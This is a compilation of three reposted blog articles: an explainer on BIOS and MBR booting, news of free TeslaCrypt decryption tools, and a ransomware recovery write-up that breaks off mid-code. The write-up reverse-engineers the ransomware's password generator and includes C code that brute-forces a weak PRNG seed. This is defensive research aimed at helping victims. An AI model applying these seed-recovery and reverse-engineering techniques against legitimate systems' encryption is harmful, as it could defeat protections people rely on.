Original Post: http://anujenater1.blogspot.com/2014/07/bios-vs-uefi.html
In the diagram below, the boot sequence for all standard computers and operating systems is shown:
As you can see, the boot process is broken down into several major components, each of which is a completely-separate subsystem with many different options and variations. The implementations of each component can differ greatly depending on your hardware and operating system, but the rules they follow and the process by which they work are always the same.
The BIOS is where hardware meets software for the first time, and where all the boot magic begins. The BIOS code is baked into the motherboard of your PC, usually stored on what is called an EEPROM, and is considerably hardware-specific. The BIOS is the lowest level of software that interfaces with the hardware as a whole, and is the interface by means of which the bootloader and operating system kernel can communicate with and control the hardware. Through standardized calls to the BIOS (“interrupts” in computer parlance), the operating system can trigger the BIOS to read and write to the disk and interface with other hardware components.
When your PC is first powered up, a lot happens. Electrical components of the PC are initially responsible for bringing your computer to life, as debouncing circuits take your push of the power button and trigger a switch that activates the power supply and directs current from the PSU to the motherboard and, mainly through it, to all the various components of your PC. As each individual component receives life-giving electricity, it is powered up and brought online to its initial state. The startup routines and overall functionality of the simpler components like the RAM and PSU are hardwired into them as a series of logic circuits (AND/NAND and OR/NOR gates), while more complicated parts such as the video card have their own microcontrollers that act as mini-CPUs, controlling the hardware and interfacing with the rest of your PC to delegate and oversee the work.
Once your PC has been powered on, the BIOS begins its work as part of the POST (Power-On Self Test) process. It bridges all the various parts of your PC together, and interfaces between them as required, setting up your video display to accept basic VGA and show it on the screen, initializing the memory banks and giving your CPU access to all the hardware. It scans the IO buses for attached hardware, and identifies and maps access to the hard disks you have connected to your PC. The BIOS on newer motherboards is smart enough to even recognize and identify USB devices, such as external drives and USB mice, letting you boot from USB sticks and use your mouse in legacy software.
During the POST procedure, quick tests are conducted where possible, and errors caused by incompatible hardware, disconnected devices, or failing components are often caught. It’s the BIOS that’s responsible for a variety of error messages such as “keyboard error or no keyboard present” or warnings about mismatched/unrecognized memory. At this point, the majority of the BIOS’ work has completed and it’s almost ready to move on to the next stage of the boot process. The only thing left is to run what are called “Add-On ROMs”: some hardware attached to the motherboard might require user intervention to complete its initialization, and the BIOS actually hands off control of the entire PC to software routines coded into hardware like the video card or RAID controllers. They assume control of the computer and its display, and let you do things like set up RAID arrays or configure display settings before the PC has even truly finished powering up. When they’re done executing, they pass control of the computer back to the BIOS, and the PC enters a basic, usable state and is ready to begin.
After having configured the basic input and output devices of your PC, the BIOS now enters the final stages where it’s still in control of your computer. At this point, you’ll normally be presented with an option to quickly hit a key to enter the BIOS setup from where you can configure hardware settings and control how your PC boots. If you choose nothing, the BIOS will begin the first step in actually “booting” your PC using the default settings.
Earlier we mentioned that an important part of the BIOS’ work is to detect and map connected hard disks. This list now comes in handy, as the BIOS will load a very small program from the first hard disk to the memory and tell the CPU to execute its contents, handing off control of the computer to whatever is on the hard drive and ending its active role in loading your PC. This hard drive is known as “the boot device,” “startup disk,” or “drive 0” and can usually be picked or set in the BIOS setup.
Regardless of whether the BIOS was configured to boot from a local hard disk or from a removable USB stick, the handoff sequence is the same. Once the BIOS POST and Add-On ROM procedures have completed, the BIOS loads the first 512 bytes from the selected boot device – these 512 bytes are what is commonly known as the MBR, or the Master Boot Record.
The MBR is the first and most important component on the software side of things in the boot procedure on BIOS-based machines. Every hard disk has an MBR, and it contains several important pieces of information.
First and foremost, the MBR contains something called the partition table, which is an index of up to four partitions that exist on the same disk, a table of contents, if you will. Without it (such as on floppy disks), the entire disk could only contain one partition, which means that you can’t have things like different filesystems on the same drive, which in turn would mean you could never install Linux and Windows on the same disk, for example.
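The partition table's layout is simple enough that a short script can walk it. Below is a minimal Python sketch that parses the four 16-byte entries found at offset 446 of a standard 512-byte MBR (the legacy CHS fields are skipped for brevity):

```python
import struct

def parse_partition_table(mbr: bytes):
    """Parse the four 16-byte partition entries at offset 446 of a 512-byte MBR."""
    assert len(mbr) == 512
    entries = []
    for i in range(4):
        entry = mbr[446 + i * 16 : 446 + (i + 1) * 16]
        # Layout: status (1), CHS start (3, skipped), type (1), CHS end (3, skipped),
        #         LBA of first sector (4), sector count (4) -- all little-endian.
        status, ptype, lba_start, num_sectors = struct.unpack("<B3xB3xII", entry)
        entries.append({
            "active": status == 0x80,   # 0x80 marks the "active" (bootable) partition
            "type": ptype,              # partition type ID (e.g. 0x07 for NTFS)
            "lba_start": lba_start,     # first sector of the partition
            "sectors": num_sectors,     # partition length in sectors
        })
    return entries
```

Feeding this the first sector of a disk image immediately reveals which of the four slots are populated and which one is flagged active.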
Secondly, the MBR also contains a very important bit of code known as the “bootstrap code.” The first 440 of these 512 bytes can contain literally anything – the BIOS will load it and execute its contents as-is, kicking off the bootloader procedure. 440 bytes is incredibly small. How small? Well, to put things in context, 440 bytes is only 0.03% of the capacity of an ancient 1.44 MiB floppy disk – barely enough to fit any form of useful code – and way, way too small to do something as complicated as call up the operating system kernel from the disk.
Given how tiny the bootstrap code section of the MBR is, the only useful purpose it can really serve is to look up another file from the disk and load it to perform the actual boot process. As such, this bootstrap code is often termed a “stage one bootloader.” Depending on the operating system, the exact place the bootstrap code searches for the “stage 2 bootloader” can change, but on Windows the stage 1 bootloader will search the partition table of the MBR for a partition marked as “active,” which is MBR-speak for “bootable,” indicating that the start of the partition contains the next portion of the boot code in its starting sectors (also known as its “bootsector”). On a correctly-created MBR disk, only one partition can be marked as active at a time.
So the job of the bootstrap code segment in the MBR is pretty simple: look up the active partition from the partition table, and load that code into the memory for execution by the CPU as the next link in the boot chain. Depending on the OS you’re loading, it might actually look up a hard-coded partition instead of the active partition (e.g. always load the bootsector of the 3rd partition) and the offset of the boot code within the partition bootsector might change (e.g. instead of being the first 2 KiB of the partition, it might be the second KiB or 6 KiB starting from the 2nd multiple of the current phase of the moon) – but the basic concept remains the same. However, for legacy compatibility reasons, the MBR almost always loads the first sector of the active partition, meaning another only-512 bytes.
On IBM-compatible PCs (basically, everything) the final two bytes of the 512-byte MBR are called the boot signature and are used by the BIOS to determine if the selected boot drive is actually bootable or not. On a disk that contains valid bootstrap code, the last two bytes of the MBR should always be 0x55 0xAA. If the last two bytes of the MBR do not equal 0x55 and 0xAA respectively, the BIOS will assume that the disk is not bootable and is not a valid boot option – in this case, it will fall back to the next device in the boot order list (as configured in the BIOS setup). For example, if the first boot device in the BIOS is set as the USB stick and the second is the local hard disk, if a USB stick without the correct boot signature is plugged in, the BIOS will skip it and move on to attempt to load from the local disk. If no disk in the boot device list has the correct 0x55 0xAA boot signature, the BIOS will then display an error such as the infamous “No boot device is available” or “Reboot and select proper boot device.”
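The signature check itself is trivial, and the fallback behavior amounts to a loop over the configured boot order. A rough Python model of what the BIOS does (the device names here are purely illustrative):

```python
def is_bootable(sector: bytes) -> bool:
    """A BIOS treats a drive as a valid boot option only if its first
    sector is 512 bytes ending in the 0x55 0xAA boot signature."""
    return len(sector) == 512 and sector[510] == 0x55 and sector[511] == 0xAA

def pick_boot_device(devices):
    """Walk the boot order list and return the first device whose first
    sector carries a valid boot signature, or None if none qualifies."""
    for name, first_sector in devices:
        if is_bootable(first_sector):
            return name
    return None  # a real BIOS would display "No boot device is available" here
```

With a blank USB stick first in the boot order and a properly-signed hard disk second, this model skips the stick and settles on the disk, just as described above.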
As covered above, the bootstrap code in the MBR will usually load a sequence of bytes from the start of the active partition. The exact layout of a partition depends what filesystem the partition has been created or formatted with, but generally looks something like this:
Again, depending on the OS and filesystem, the exact layout of the partition will certainly differ. But this represents a close approximation to what you’ll normally see:
This is all usually packed into the first sector of the partition, which is normally again only 512 bytes long, and again, can’t fit too much data or instructions. On modern filesystems for newer operating systems, the bootstrap code can take advantage of enhanced BIOS functionality to read and execute more than just 512 bytes, but in all cases, the basic steps remain the same:
The bootstrap code in the partition is not the end of the road, it’s only another step along the way. Because of how little space is allocated for the bootstrap code in the partition bootsector, the code it contains normally ends with another JMP command instructing the CPU to jump to the next sector in the partition, which is often set aside for the remainder of the partition code. Depending on the filesystem, this can be several sectors in length, or however long it needs to be to fit this stage of the bootloader.
The second stage of the bootloader, stored in the partition bootsector in the bootstrap section and, optionally, continuing beyond it, carries out the next step in the bootloader process: it looks up a file stored on the partition itself (as a regular file), and tells the CPU to execute its contents to begin the final part of the boot process.
Unlike the previous bootstrap segments of the MBR and the partition bootsector, the next step in the boot process is not stored at a dedicated offset within the partition (i.e. the bootstrap code can’t just tell the CPU to JMP to location 0xABC and execute the boot file from there) – it’s a normal file stored amongst other normal files in the filesystem on the disk.
This significantly more-complicated bootstrap code must actually read the table of contents for the filesystem on the partition and locate the bootloader file within it. Second-stage bootloaders for older filesystems oftentimes placed complicated restrictions on the bootloader files they needed to load, such as requiring them to appear in the first several kilobytes of the partition, or being unable to load non-contiguously allocated files. This file is the last piece of the bootloader puzzle, and there are usually no restrictions as to its size or contents, meaning it can be as large and as complicated as it needs to be to load the operating system kernel from the disk and pass on control of the PC to the OS.
The actual bootloader files on the disk form the final parts of the boot loading process. When people talk about bootloaders and boot files, they are often referring to this final, critical step of the boot process.
Once control of the PC has been handed off from the BIOS to the bootstrap code in the MBR, from the MBR to the bootstrap code in the partition bootsector, and from there to the executable boot files on the active partition, the actual logic kicks in: determining which operating system to load, where to load it from, which parameters/options to pass on to it, and completing any interactions with the user that might be available. Only then does the actual process of starting the operating system begin.
While the executable bootloader files could theoretically contain hard-coded information pertaining to the operating systems to be loaded from the disk, that wouldn’t be very useful at all. As such, almost all bootloaders separate the actual, executable bootloader from the configuration file or database that contains information about the operating system(s) to load. All of the major bootloaders mentioned below have support for loading multiple operating systems, a process known as “dual-booting” or “multi-booting.”
As discussed previously, there are many different bootloaders out there. Each operating system has its own bootloader, specifically designed to read its filesystem and locate the kernel that needs to be loaded for the OS to run. Here are some of the more-popular bootloaders – and their essential configuration files – for some of the common operating systems:
Each of the popular operating systems has its own default bootloader. Windows NT, 2000, and XP, as well as Windows Server 2003, use the NTLDR bootloader. Windows Vista introduced the BOOTMGR bootloader, currently used by Windows Vista, 7, 8, and 10, as well as Windows Server 2008 and 2012. While a number of different bootloaders have existed for Linux over the years, the two predominant bootloaders were LILO and GRUB, but now most Linux distributions have coalesced around the all-powerful GRUB 2 bootloader.
NTLDR is the old Windows bootloader, first used in Windows NT (hence the “NT” in “NTLDR,” short for “NT Loader”), and currently used in Windows NT, Windows 2000, Windows XP, and Windows Server 2003.
NTLDR stores its boot configuration in a simple, text-based file called BOOT.INI, stored in the root directory of the active partition (often C:\Boot.ini). Once NTLDR is loaded and executed by the second-stage bootloader, it executes a helper program called NTDETECT.COM that identifies hardware and generates an index of information about the system. More information about NTLDR, BOOT.INI, and NTDETECT.COM can be found in the linked articles in our knowledgebase.
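For reference, a typical BOOT.INI looks something like this (the exact ARC paths and OS descriptions vary from system to system):

```ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
```

Because it's plain text, BOOT.INI could be edited with nothing more than Notepad – a convenience its successor, the BCD, would do away with.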
BOOTMGR is the newer version of the bootloader used by Microsoft Windows, and it was first introduced in the beta versions of Windows Vista (then Windows Codename Longhorn). It’s currently used in Windows Vista, Windows 7, Windows 8, Windows 8.1, and Windows 10, as well as Windows Server 2008 and Windows Server 2012.
BOOTMGR marked a significant departure from NTLDR. It is a self-contained bootloader with many more options, especially designed to be compatible with newer functionality in modern operating systems and designed with EFI and GPT in mind (though only certain versions of BOOTMGR support loading Windows from a GPT disk or in a UEFI/EFI configuration). Unlike NTLDR, BOOTMGR stores its configuration in a file called the BCD – short for Boot Configuration Data. Unlike BOOT.INI, the BCD file is a binary database that cannot be opened and edited by hand. Instead, specifically designed command-line tools like bcdedit.exe and more user-friendly GUI utilities such as EasyBCD must be used to read and modify the list of operating systems.
GRUB was the predominantly-used bootloader for Linux in the 1990s and early 2000s, designed to load not just Linux, but any operating system implementing the open multiboot specification for its kernel. GRUB’s configuration file containing a whitespace-formatted list of operating systems was often called menu.lst or grub.lst, and found under the /boot/ or /boot/grub/ directory. As these values could be changed by recompiling GRUB with different options, different Linux distributions had this file located under different names in different directories.
While GRUB eventually won out over LILO and ELILO, it was replaced with GRUB 2 around 2002, and the old GRUB was officially relegated to the name “Legacy GRUB.” Confusingly, GRUB 2 is now officially called just GRUB, but you’ll thankfully find most resources online referring to the newer incarnation of the bootloader as GRUB 2.
GRUB 2 is a powerful, modular bootloader more akin to an operating system than a bootloader. It can load dozens of different operating systems, and supports custom plugins (“modules”) to introduce more functionality and support complex boot procedures.
The actual bootloader file for GRUB 2 is not a file called GRUB2, but rather a file usually called core.img. Unlike Legacy GRUB, the GRUB 2 configuration file is more of a script and less of a traditional configuration file. The grub.cfg file, normally located at /boot/grub/grub.cfg on the boot partition, bears resemblance to shell scripts and supports advanced concepts like functions. The core functionality of GRUB 2 is supplemented with modules, normally found in a subdirectory of the /boot/grub/ directory.
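To illustrate the script-like nature of grub.cfg, here is a stripped-down example of a single menu entry (the paths and device names are illustrative; real grub.cfg files are normally machine-generated by grub-mkconfig and considerably longer):

```
menuentry "Linux" {
    set root=(hd0,1)
    linux /boot/vmlinuz root=/dev/sda1
    initrd /boot/initrd.img
}
```

Note the shell-like `set` assignment and brace-delimited block: this is executable configuration, not a static list of options.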
As previously mentioned, this stage of the boot process is a little more involved than the previous steps, primarily due to the additional complexity of reading the filesystem. The bootloader must also obtain information about the underlying machine hardware (either via the BIOS or on its own) in order to correctly load the desired operating system from the correct partition and provide any additional files or data that might be needed. It must also read its own configuration file from a regular file stored on the boot partition’s filesystem, so it needs to at the very least have full read support for whatever filesystem it resides on.
Thus ends the lengthy journey that begins with the push of a button and ends with an operating system’s kernel loaded into the memory and executed. The bootloader process is certainly a lot more nuanced and complicated than most realize, and it has both been designed and evolved to work in a fairly-standardized fashion across different platforms and under a variety of operating systems.
The individual components of the bootloader are, by and large, self-sufficient and self-contained. They can be swapped out individually without affecting the whole, meaning you can add disks and boot from different devices without worrying about upsetting existing configurations and operating systems. It also means that instead of having one, single bit of hardware/software to configure, set up, maintain, and debug, you are instead left with an intricate and oftentimes very fragile chain with multiple points susceptible to breakage and failure. When working properly, the boot process is a well-oiled machine, but when disaster strikes, it can be a very difficult process to understand and debug.
Original Post: https://neosmart.net/wiki/mbr-boot-process/
TeslaCrypt is one of the most insidious ransomware families first detected in the wild in 2015, and today there is good news for its victims.
TeslaCrypt was first detected in February 2015; the ransomware encrypted user data, including files associated with video games. In July, a new variant, TeslaCrypt 2.0, appeared in the wild with an improved encryption mechanism.
Both strains of the ransomware, TeslaCrypt and TeslaCrypt 2.0, are affected by a security flaw that has been exploited by security experts to develop a free file decryption tool.
The design issue affects the encryption key storage algorithm; the vulnerability has been fixed in the new release, TeslaCrypt 3.0, which improved the malware in a significant way.
The security expert Lawrence Abrams published an interesting blog post detailing the issue, confirming that a decryption tool had been available for a while, but that the news was withheld to avoid tipping off the malware's developers.
Since TeslaCrypt 3.0 resolves the issue, the research community decided to release decryption tools in the wild, e.g. TeslaCrack (https://github.com/Googulator/TeslaCrack).
“For a little over a month, researchers and previous victims have been quietly helping TeslaCrypt victims get their files back using a flaw in the TeslaCrypt’s encryption key storage algorithm. The information that the ransomware could be decrypted was being kept quiet so that the malware developer would not learn about it and fix the flaw. Since the recently released TeslaCrypt 3.0 has fixed this flaw, we have decided to publish the information on how a victim could generate the decryption key for encrypted TeslaCrypt files that have the extensions .ECC, .EZZ, .EXX, .XYZ, .ZZZ, .AAA, .ABC, .CCC, and .VVV. Unfortunately, it is currently not possible to decrypt the newer versions of TeslaCrypt that utilize the .TTT, .XXX, and .MICRO extensions,” wrote Abrams.
As explained in the post, files encrypted with the newer versions of TeslaCrypt are recognizable by the extension (.TTT, .XXX, and .MICRO) and cannot be decrypted.
TeslaCrypt encrypts files with the AES algorithm, using the same key for both encryption and decryption. Abrams explained that the threat generated a new AES key each time it restarted, and stored information about that key in each file encrypted during the session. Fortunately, the way this key material was stored left it vulnerable: specialized programs can factorize the stored large number into its prime factors, which other specialized tools can then use to reconstruct the decryption key.
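To make the idea concrete, here is a toy Python sketch (not the actual TeslaCrack code): if the key material stored in a file is the product of secret primes, factoring that product recovers them. Naive trial division suffices for the small numbers below; the real tools relied on serious factorization software, since TeslaCrypt's stored values were vastly larger.

```python
def factorize(n: int):
    """Naive trial-division factorization. Fine for a toy example, but far too
    slow for real TeslaCrypt-sized integers, which required dedicated tools."""
    factors = []
    d = 2
    while d * d <= n:
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 1
    if n > 1:
        factors.append(n)  # whatever remains is itself prime
    return factors

# Toy model: suppose the "stored key material" is the product of two secret primes.
p, q = 2003, 3119
stored = p * q
recovered = factorize(stored)  # the primes fall right out
```

The recovered primes are then fed into a key-reconstruction step; in TeslaCrack's case that step rebuilds the AES key used for the session.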
Another interesting tool for decrypting the files is TeslaDecoder, it has been available for decrypting TeslaCrypt files since May 2015 and it has been updated to recover the encryption key for all TeslaCrypt variants.
If you are one of the numerous victims of the TeslaCrypt ransomware, you can now recover your files using TeslaCrack or TeslaDecoder.
Original Post: http://securityaffairs.co/wordpress/43926/cyber-crime/teslacrypt-decryption-tool.html
In early 2013, an organization approached Cylance for help recovering from a devastating ransomware attack that made it impossible to access large numbers of critical files. The attacker used a version of the “Anti-Child Porn Spam Protection” ransomware, which combed every drive it could find and encrypted critical files. The backup drives were mounted when the attack hit, so they faced a total data loss. Fortunately we were able to derive the password used to encrypt that data and commence recovery. This blog presents the technical story behind the work we did to crack that code.
We have held off on going public out of concern that releasing this data could prompt the ransomware authors to identify methods for better securing their passwords. There is plenty of evidence that malware developers follow the work of security firms. For example, a few months after we cracked this case, another firm publicly announced that they could recover files encrypted by the same ransomware. Although the firm did not publish details, it appears that the malware authors took the announcement seriously enough to take countermeasures. A new version of the ransomware soon appeared that was no longer susceptible to the same password-guessing technique. The authors even professed explicit knowledge of the weak password-generation flaw in comments inserted in the malware. We presented at Black Hat USA in 2013 on attacking pseudorandom number generators, but this is the first time we have discussed how we cracked the ransomware.
We encourage other researchers to exercise discretion when they discover a correctable flaw in ransomware. Work privately with trusted agencies and organizations that victims are likely to contact, so that the ransomware remains flawed and its victims can be helped for as long as possible.
(Editor’s note: A shorter version of this report appeared last month on the RSA Conference Blog.)
Earlier ransomware specimens from the same family, commonly called ACCDFISA, were defeated by researchers who exploited mistakes or oversights by the ransomware’s developer. The version we faced seemed to have been improved by the experience. It claimed to use AES-256 encryption with a 256-character random key generated individually for each victim and communicated back to the attacker. It also claimed to securely delete files to prevent recovery of any unencrypted original files or passwords. Those claims demonstrated an awareness of how a naive ransomware attack could be beaten, suggesting that correct technical countermeasures had been taken to dash any hopes of recovery. Had the ransomware author finally gotten everything right?
We examined one of the victim’s encrypted files, which was renamed with the instructions “(!! to decrypt email id … to …@… !!).exe.” The file was a WinRAR self-extractor containing an encrypted RAR. Finding a flaw in WinRAR’s cryptographic implementation didn’t seem a promising approach, so instead we decided to crack the password. To do that we needed the code that created it.
We found the malware and a number of files that seemed to be associated with it on the infected drive. One file was Microsoft Sysinternals’ sdelete utility, which permanently deletes files and which we also didn’t imagine would contain a bug that would lead us to a quick victory. We also found a “NoSafeMode” library and a RAR utility for making self-extractors. The presence of these files suggested that the attackers had created a Frankenstein’s monster of stolen code, crudely sewn together with a main ransomware executable that appeared to be written in PureBasic. The RAR utility gave us a place to start reverse engineering the ransomware. The utility accepts the encryption key password as a command-line argument, so we reasoned that backtracking from the point in the ransomware code that launches the utility would lead us to the place where the password is constructed.
We started by running the ransomware on a disposable system. We attached a debugger and intercepted the CreateProcess calls that launch the RAR utility to encrypt our files. With a little effort, we got the debugger to break at the right point and were able to view the full command line, which included the password in the “-hp” switch.
This test run gave us a password. It was not necessarily the password used to encrypt the victim’s files, but it gave us some clues to guide our reverse-engineering effort: We could look for the password or pieces of it, we could search for the likely “alphabet” used to generate the password if it is random, and we could search for the “-hp” string used to build the password portion of the command line.
The intercepted password appeared to be a 57-character mixture of letters, digits and punctuation marks. It was too random to have been keyed in by a human and had “aes” in the prefix. This latter feature could just be a coincidence, like spotting a meaningful word or number on a license plate, or it could be an intentional prefix which turns up as a hard-coded string in the ransomware code. In fact, when we opened the ransomware in a disassembler, we found not just an “aes” string, but the full “aesT322” prefix:
This told us that the password is actually “aesT322” followed by 50 presumably random characters.
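In Python terms, the scheme looks like this (a model of the scheme, not the ransomware's actual PureBasic code; the 16 punctuation marks below are a stand-in, since the exact set isn't reproduced here):

```python
import random

ALPHABET = (
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789"
    "!#$%&()*+,-./:;="   # placeholder for the 16 punctuation marks
)
PREFIX = "aesT322"

def generate_password(rng: random.Random) -> str:
    """Model of the ransomware's scheme: a fixed 7-character prefix
    followed by 50 pseudorandomly chosen characters."""
    assert len(ALPHABET) == 78          # 26 + 26 + 10 + 16
    return PREFIX + "".join(rng.choice(ALPHABET) for _ in range(50))
```

Run with any seed, this always yields a 57-character password beginning with "aesT322" – exactly the shape of the password we intercepted.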
In the screenshot above, the partially highlighted instruction is where the program loads a reference to the “aesT322” string. We guessed that the next instruction loads a reference to some global variable where that string will be stored. We’ve already named the variable “PasswordPrefix”, but it was easy to double-check that assertion. First we located where that variable resides in memory.
This portion of the ransomware’s data section contains some global variables involved in random password generation. Like before, we’ve renamed and commented on some of the variables.
With the addresses of the variables, we returned to the debugger to see what values they held during our live test run. Here’s what we found:
While the disassembler lets us easily browse the ransomware’s code as a static or “dead” program on disk, the debugger enables us to pick through the memory of a “live” ransomware process as it’s running. Here, we can view the values taken by three string variables.
Just as we had expected, the variable named “PasswordPrefix” pointed to a copy of the “aesT322” prefix string. “PasswordRandom” pointed to a string of 50 random characters and “PasswordFull” pointed to a string comprising the two parts concatenated.
We then validated our findings and methodology by revisiting the third approach, tracking down the “-hp” string. Back in the disassembler, a very quick search led to one of a few instances:
We understood more about the ransomware but were still not sure if we could help the victim. We had ruled out the possibility that the password might be the same for all victims. Fortunately, the disassembler makes it easy to find every place a variable is accessed, so we could backtrack to the code where “PasswordFull” is constructed:
This code builds “PasswordFull” by concatenating “aesT322” with the random string.
Next, we followed cross-references to “PasswordRandom.”
We found a loop that counts from 1 to 50, which matches the 50-character length of the password’s random portion. Inside the loop we found a string that looked like an “alphabet” from which the 50 characters would be randomly chosen. The alphabet included 26 lowercase letters, 26 uppercase letters, 10 digits, and 16 punctuation symbols.
The next step was to figure out which function (from the subroutines called inside the loop) selects a random character. Despite popular belief, computers struggle to be truly random; attacking what’s often and more appropriately referred to as the pseudorandom number generator has long been a fruitful approach to defeating encryption. We labeled the function “_get_random_Alphabet_char” above. The function disassembles as follows:
That disassembly was fairly easy reading after we determined that the highlighted function is “Rnd” (PureBasic’s random number generating function). This is what the function looks like inside:
The “Rnd” function wraps calls to even more functions, which we named. The function “_internal_Randomize_default” calls a few Windows functions, as well as a function internal to the ransomware that we’ve named “_internal_RandomInit.” The following screenshot displays side-by-side disassemblies of both.
We finally had a breakthrough. On the left, we see that the PRNG is initialized, or seeded, with a 32-bit number derived from the identifier of the thread executing this code and how long the system has been running in milliseconds, both rather predictable values. On the right, we’ve highlighted a “magic” constant–a special-purpose number that typically lends itself to an Internet search. The number appears here in hexadecimal as 53A9B4FBh, although other likely representations include 0x53A9B4FB or the decimal representation 1403630843. The instructions that follow it can be translated to the expression “1 – EAX * 0x53A9B4FB,” meaning the constant we see may actually be the negation -1403630843, which could be represented as AC564B05h, 0xAC564B05, or 2891336453 if treated as unsigned. Searching the Internet for these various terms eventually led to source code ostensibly related to random number generators, as well as a disassembly posted in a PureBasic forum.
Below, the disassembly of the purported “Rnd” function further corroborated our findings with its prominent rotate operations, which have counterparts in the source code we found online.
This is where things got exciting. Thanks to the 32-bit seed, we knew there could be at most 4 billion possible passwords, not the nonillions of nonillions of possibilities that 50 characters picked truly randomly from an alphabet of 78 would yield. This is because, as noted before, computers usually operate with rigid determinism even when they’re trying to act random. For any given seed value, the PRNG will produce the exact same numbers in the exact same order any time it’s initialized with that value. Since the seed is a 32-bit number, it can range from zero to about 4 billion, and therefore the realm of possible initial states is equally confined.
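The collapse in keyspace is easy to quantify:

```python
import math

true_keyspace = 78 ** 50    # 50 truly random picks from the 78-character alphabet
seeded_keyspace = 2 ** 32   # but every password is fully determined by a 32-bit seed

# The seed collapses roughly 10^94 possibilities down to about 4.3 billion.
print(math.log10(true_keyspace))   # about 94.6 decimal digits of keyspace
print(seeded_keyspace)             # 4294967296
```

Four billion candidates is a number a single modern machine can actually enumerate, which is what turns "unbreakable" 50-character passwords into a feasible brute-force target.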
Of course, a list of 4 billion passwords is no trifling thing. In this case, we’re greatly assisted by the choice of seed sources–a thread ID and the system uptime. The former is a multiple of 4 and typically less than 10,000, while the latter is more variable. Over the course of 49.7 days, the uptime will count from zero to 4 billion and then wrap around to become zero again, typically counting by 15 or 16 as it goes. If we can catch a hint of how long the victimized system had been running prior to the attack, we can greatly narrow down the possible values of the uptime component of the seed and accordingly the number of passwords to try.
The problem with guessing passwords is that it’s expensive in terms of time. Generating a password from a given seed is very fast, but in the quick-and-dirty system we threw together, we could only test a guess by attempting to decrypt the RAR and checking if anything sensible came out, a comparatively costly operation especially when attempted millions of times. As it turns out, we didn’t find a record of when the victim’s computer had started last, but on the way we discovered something even better.
One of the first things we noticed when examining the infected drive was a variety of strange files stashed in the “\ProgramData” folder, under hidden subdirectories of various randomly-lettered names. We also found a text file, “\ProgramData\svcfnmainstvestvs\stppthmainfv.dll”, containing 21 lines of eight random letters each. With further scrutiny, we realized that each line was the reverse of a random subdirectory or file name also created by the ransomware under “\ProgramData”.
The value of this data isn’t that we need a list of names–its value is that it represents output from the PRNG that gets left behind after an infection. In the case of a real infection, like the one we were called in to resolve, we of course wouldn’t have captured the password like we did in our test run, but chances are good we could still find “stppthmainfv.dll” or reconstruct it based on what’s in the infected drive’s “\ProgramData” directory. With this data, we can simply brute-force all possible seed values–all the way to four billion if needed–and figure out which value was used to seed the PRNG before it cranked out all these random names. The search should take no more than a few hours on a reasonable computer, making it orders of magnitude faster than feeding guessed passwords to a RAR utility.
There are a few catches though. First, as suggested by the Thread Local Storage (TLS) calls spotted in the random functions, each thread has its own PRNG state, initialized independently the first time “Rnd” is called. It so happens that the random eight-letter names are generated on the ransomware process’s main thread, while the password is decided on a second thread. The following code is the loop where the 21 names are generated; the code cross-reference (“CODE XREF”) comments, in green, indicate that the code resides in the program’s “start” function, which runs on the process’s first thread.
This loop, in the ransomware’s “start” function, creates the 21 random file and subdirectory names.
This is the loop in the function annotated above that chooses the eight random letters from a regular A-to-Z alphabet. As expected, the function calls “Rnd” once per letter.
The password-generation code, on the other hand, we traced to a function tagged “sub_406582”, which is called by a function we named “_ServiceMain”, which Windows executes on a separate thread when the ransomware runs as a Windows service. This means that the two code regions of interest will execute with separate PRNG states, each seeded by a different value. Brute-forcing the seed value that gave the random names won’t directly give us the password seed value, although it should put us in the neighborhood, owing to the simplicity and predictability of its sources. Put another way, the seed values will differ in both the system uptime and thread ID components, since the threads start at different times and necessarily must have different IDs if they run concurrently, but they won’t differ by much. With the first seed value in hand, we can conservatively narrow the possibilities for the second to perhaps a range of a few hundred thousand.
A second catch, easily overlooked, is that we have a sequence of letters, but the PRNG technically issues a sequence of numbers. In this case, as depicted in the preceding screenshot, numbers from 0 to 25 straightforwardly represent the letters “a” through “z”, so the intuitive alphabet mapping letters to numbers is the correct one. In other cases, however, letters could have been omitted, duplicated, reordered, or interspersed with other characters that we didn’t happen to see in “stppthmainfv.dll”, any of which could have meant wasted hours of misguided brute-forcing attempts if we hadn’t been paying attention.
A third complication is that there’s no guarantee that the PRNG is being seeded immediately before the ransomware generates the names or password. Other calls to “Rnd” could take place earlier in either or both threads, meaning that the PRNG’s state wouldn’t be the pristine seeded state when the random generation code in question executes. We needed to figure out how many times “Rnd” is called in each thread prior to the calls we care about, and discard that many random numbers before generating our own speculative names or passwords.
So let’s look for “Rnd” calls. Scrolling up a bit in the disassembly, we see only one call to “Rnd” in the “start” function, shown here:
The first call to “Rnd” executed by the ransomware, and the only call made before the file and subdirectory name-generation loop.
On the other hand, the “_ServiceMain” thread which executes the password generation code calls “Rnd” three times before it uses the PRNG to construct the password, as depicted below.
Three calls to “Rnd” precede the password generation code on the “_ServiceMain” thread.
These three calls mean that, once we’re ready to start generating candidate passwords, we’d better discard the first three random numbers after each seeding.
Finally, we were ready to begin brute-forcing. Our program for finding the names seed value looked something like this: (We’ve omitted the PureBasic PRNG reimplementation for brevity.)
// (RandomSeed and Rnd belong to the omitted PureBasic PRNG reimplementation)
int i;
for (unsigned int seed = 0; ; seed++)
{
    // seed the PRNG with a possible value
    RandomSeed(seed);
    // discard one random number
    Rnd(25);
    for (i = 0; i < 21 * 8; i++)
    {
        // generate the next random letter
        // Rnd(25): from 0 to 25 inclusive
        char ch = "abcdefghijklmnopqrstuvwxyz"[Rnd(25)];
        // does this letter match the next in the sequence?
        if (ch != "chlqfohkayfwicdd…dszeljdp"[i])
            break;
    }
    // did we complete the entire sequence?
    if (i == 21 * 8)
    {
        // yes, display the result and finish
        printf("Names seed = %u\n", seed);
        break;
    }
    // no, try the next seed value
}
In about 4 seconds on a single CPU core, the code tested 31,956,209 possibilities and found that the last one–seed value 31,956,208–generated the same sequence of letters as observed in “stppthmainfv.dll”. Obtaining that one number validated all of our work up to that point.
The system we devised for turning this information into results was considerably less elegant, but at that point we figured any working prototype would do. Taking a mostly wild guess, we assumed that the seed value responsible for generating the password would be no further than 32,768 below or 180,000 (3 minutes in milliseconds) above the names seed value we just recovered. Accordingly, we generated a list of approximately 200,000 passwords based on the possible seed values in that range, using code like the following:
// (RandomSeed and Rnd belong to the omitted PureBasic PRNG reimplementation)
// this is the names seed value we brute-forced earlier
unsigned int namesseed = 31956208;
